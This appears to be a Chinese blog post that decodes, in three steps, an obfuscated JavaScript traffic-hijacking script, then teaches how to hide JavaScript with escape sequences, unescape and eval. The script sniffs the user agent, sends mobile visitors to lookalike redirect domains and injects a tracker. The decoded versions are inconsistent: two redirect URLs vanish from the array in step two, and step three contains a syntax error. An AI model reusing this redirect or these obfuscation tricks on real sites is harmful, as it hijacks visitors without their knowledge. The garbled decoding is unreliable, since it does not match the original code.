第一步解码:
var _$ = ["\x77\x66", "\x3f", "\x26\x74\x3d\x7a\x72", '\x54\x72\x69\x64\x65\x6e\x74', '\x50\x72\x65\x73\x74\x6f', '\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74', '\x47\x65\x63\x6b\x6f', '\x4b\x48\x54\x4d\x4c', '\x41\x6e\x64\x72\x6f\x69\x64', '\x4c\x69\x6e\x75\x78', '\x69\x50\x68\x6f\x6e\x65', '\x69\x50\x61\x64', '\x53\x61\x66\x61\x72\x69', "\x68\x74\x74\x70\x3a\x2f\x2f\x62\x61\x69\x64\x75\x2d\x67\x6f\x6f\x67\x6c\x65\x2d\x73\x6f\x67\x6f\x75\x2d\x73\x6f\x73\x6f\x2d\x33\x36\x30\x2d\x71\x71\x2e\x6d\x61\x68\x6a\x75\x6e\x2e\x63\x6f\x6d\x2f\x63\x64\x6e\x2f\x69\x6e\x64\x65\x78\x2e\x68\x74\x6d\x6c\x3f", '\x68\x74\x74\x70\x3a\x2f\x2f\x69\x6f\x73\x2e\x61\x64\x61\x6e\x7a\x68\x75\x6f\x2e\x63\x6f\x6d\x2f\x67\x6f\x33\x2e\x70\x68\x70\x3f', '\x26\x74\x69\x64\x3d\x31\x35', "\x3c\x73\x63\x72\x69\x70\x74\x20\x74\x79\x70\x65\x3d\'\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\'\x20\x63\x68\x61\x72\x73\x65\x74\x3d\'\x67\x62\x32\x33\x31\x32\'\x20\x73\x72\x63\x3d\'\x68\x74\x74\x70\x3a\x2f\x2f\x6a\x73\x2e\x61\x64\x6d\x2e\x63\x6e\x7a\x7a\x2e\x6e\x65\x74\x2f\x73\x2e\x70\x68\x70\x3f\x73\x69\x64\x3d\x32\x36\x37\x31\x37\x34\'\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e"]var a = window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64"](_$[0])["\x73\x72\x63"]src = a["\x73\x70\x6c\x69\x74"](_$[1])[0x1] + _$[2]
var b = {
versions: function() {
var c = navigator["\x75\x73\x65\x72\x41\x67\x65\x6e\x74"],
d = navigator["\x61\x70\x70\x56\x65\x72\x73\x69\x6f\x6e"]
return {
trident: c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[3]) > -0x1,
presto: c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[4]) > -0x1,
webKit: c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[5]) > -0x1,
gecko: c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[6]) > -0x1 && c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[7]) == -0x1,
mobile: !!c["\x6d\x61\x74\x63\x68"](/AppleWebKit.*Mobile.*/),
ios: !!c["\x6d\x61\x74\x63\x68"](/\(i[^]+( U)? CPU.+Mac OS X/),
android: c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[8]) > -0x1 || c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[9]) > -0x1,
iPhone: c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[10]) > -0x1,
iPad: c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[11]) > -0x1,
webApp: c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[12]) == -0x1
}
} (),
language: (navigator["\x62\x72\x6f\x77\x73\x65\x72\x4c\x61\x6e\x67\x75\x61\x67\x65"] || navigator["\x6c\x61\x6e\x67\x75\x61\x67\x65"])["\x74\x6f\x4c\x6f\x77\x65\x72\x43\x61\x73\x65"]()
}
if (b["\x76\x65\x72\x73\x69\x6f\x6e\x73"]["\x6d\x6f\x62\x69\x6c\x65"] != false && b["\x76\x65\x72\x73\x69\x6f\x6e\x73"]["\x61\x6e\x64\x72\x6f\x69\x64"] != false) {
window["\x6c\x6f\x63\x61\x74\x69\x6f\x6e"]["\x68\x72\x65\x66"] = _$[13] + src
} else if (b["\x76\x65\x72\x73\x69\x6f\x6e\x73"]["\x6d\x6f\x62\x69\x6c\x65"] != false && (b["\x76\x65\x72\x73\x69\x6f\x6e\x73"]["\x69\x50\x68\x6f\x6e\x65"] != false || b["\x76\x65\x72\x73\x69\x6f\x6e\x73"]["\x69\x50\x61\x64"] != false || b["\x76\x65\x72\x73\x69\x6f\x6e\x73"]["\x69\x50\x6f\x64"] != false)) {
window["\x6c\x6f\x63\x61\x74\x69\x6f\x6e"]["\x68\x72\x65\x66"] = _$[14] + src + _$[15]
}
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"](_$[16])
第二步解码:
var _$ = ["wf", "?", "&t=zr", 'Trident', 'presto', 'AppleWebkit', 'Gecko', 'kHTML', 'Android', 'Linux', 'iphone', 'ipad', 'Safari', '&tid=15', "<script type=\'text/javascript\' charset=\'gb2312\' src=\'http://js.adm.cnzz.net/s.php?sid=267174\'></script>"]
var a = window["document"]["getElementById"](_$[0])["src"]src = a["split"](_$[1])[0x1] + _$[2]
var b = {
versions: function() {
var c = navigator["userAgent"],
d = navigator["appVersion"]
return {
trident: c["indexOf"](_$[3]) > -0x1,
presto: c["indexOf"](_$[4]) > -0x1,
webKit: c["indexOf"](_$[5]) > -0x1,
gecko: c["indexOf"](_$[6]) > -0x1 && c["indexOf"](_$[7]) == -0x1,
mobile: !!c["match"](/AppleWebKit.*Mobile.*/),
ios: !!c["match"](/\(i[^]+( U)? CPU.+Mac OS X/),
android: c["indexOf"](_$[8]) > -0x1 || c["indexOf"](_$[9]) > -0x1,
iPhone: c["indexOf"](_$[10]) > -0x1,
iPad: c["indexOf"](_$[11]) > -0x1,
webApp: c["indexOf"](_$[12]) == -0x1
}
} (),
language: (navigator["browserLanguage"] || navigator["language"])["toLower\x43ase"]()
}
if (b["versions"]["mobile"] != false && b["versions"]["android"] != false) {
window["location"]["href"] = _$[13] + src
} else if (b["versions"]["mobile"] != false && (b["versions"]["iphone"] != false || b["versions"]["ipad"] != false || b["versions"]["ipod"] != false)) {
window["location"]["href"] = _$[14] + src + _$[15]
}
window["document"]["writeln"](_$[16])
第三步解码
var a = document.getElementById('wf').srcsrc = a.split('?')[1] + '&t=zr'
var b = {
versions: function() {
var c = navigator.userAgent,
d = navigator.appVersion
return {
trident: c.indexOf('Trident') > -1,
presto: c.indexOf( 'presto') > -1,
webKit: c.indexOf('AppleWebkit') > -1,
gecko: c.indexOf('Gecko') > -1 && c.indexOf('kHTML') == -1,
mobile: !!c.match.(/AppleWebKit.*Mobile.*/),
ios: !!c.match(/\(i[^]+( U)? CPU.+Mac OS X/),
android: c.indexOf('Android') > -1 || c.indexOf('Linux') > -1,
iPhone: c.indexOf('iphone') > -1,
iPad: c.indexOf('ipad') > -1,
webApp: c.indexOf('Safari') == -1
}
} (),
language: (navigator.browserLanguage || navigator.language).toLowerCase()
}
if (b["versions"]["mobile"] != false && b["versions"]["android"] != false) {
location.href = 'http://baidu-google-sogou-soso-360-qq.mahjun.com/cdn/index.html?' + src
} else if (b["versions"]["mobile"] != false && (b["versions"]["iphone"] != false || b["versions"]["ipad"] != false || b["versions"]["ipod"] != false)) {
location.href = 'http://ios.adanzhuo.com/go3.php?' + src + '&tid=15'
}
document.writeln('<script type=\'text/javascript\' charset=\'gb2312\' src=\'http://js.adm.cnzz.net/s.php?sid=267174\'></script>')
一、base64加密使用JS函数的window.btoa()和 window.atob(),分别是编码和解码
二、编码和解码字符串
使用JS函数的escape()和unescape(),分别是编码和解码
三、AES加密解密
四、RSA加密解密
一:最简单的加密解密大家对于JAVASCRIPT函数escape()和unescape()想必是比较了解啦(很多网页加密在用它们),分别是编码和解码字符串,比如例子代码用escape()函数加密后变为如下格式:
alert%28%22%u9ED1%u5BA2%u9632%u7EBF%22%29%3B
如何?还看的懂吗?当然其中的ASCII字符"alert"并没有被加密,如果愿意我们可以写点JAVASCRIPT代码重新把它加密如下:
%61%6C%65%72%74%28%22%u9ED1%u5BA2%u9632%u7EBF%22%29%3B
呵呵!如何?这次是完全都加密了!
当然,这样加密后的代码是不能直接运行的,幸好还有eval(codeString)可用,这个函数的作用就是检查JavaScript代码并执行,必选项 codeString 参数是包含有效 JavaScript 代码的字符串值,加上上面的解码unescape(),加密后的结果如下:
<SCRIPT LANGUAGE="JavaScript">
var code=unescape("%61%6C%65%72%74%28%22%u9ED1%u5BA2%u9632%u7EBF%22%29%3B")
eval(code)
</SCRIPT>
是不是很简单?不要高兴,解密也就同样的简单,解密代码都摆给别人啦(unescape())!呵呵
二:转义字符"\"的妙用
大家可能对转义字符"\"不太熟悉,但对于JavaScript提供了一些特殊字符如:\n (换行)、 \r (回车)、\' (单引号 )等应该是有所了解的吧?其实"\"后面还可以跟八进制或十六进制的数字,如字符"a"则可以表示为:"\141"或"\x61"(注意是小写字符"x"),至于双字节字符如汉字"黑"则仅能用十六进制表示为"\u9ED1"(注意是小写字符"u"),其中字符"u"表示是双字节字符,根据这个原理例子代码则可以表示为:
八进制转义字符串如下:
<SCRIPT LANGUAGE="JavaScript">
eval("\141\154\145\162\164\50\42\u9ED1\u5BA2\u9632\u7EBF\42\51\73")
</SCRIPT>
十六进制转义字符串如下:
<SCRIPT LANGUAGE="JavaScript">
eval("\x61\x6C\x65\x72\x74\x28\x22\u9ED1\u5BA2\u9632\u7EBF\x22\x29\x3B")
</SCRIPT>
这次没有了解码函数,因为JavaScript执行时会自行转换,同样解码也是很简单如下:
<SCRIPT LANGUAGE="JavaScript">
alert("\x61\x6C\x65\x72\x74\x28\x22\u9ED1\u5BA2\u9632\u7EBF\x22\x29\x3B")
</SCRIPT>
就会弹出对话框告诉你解密后的结果!
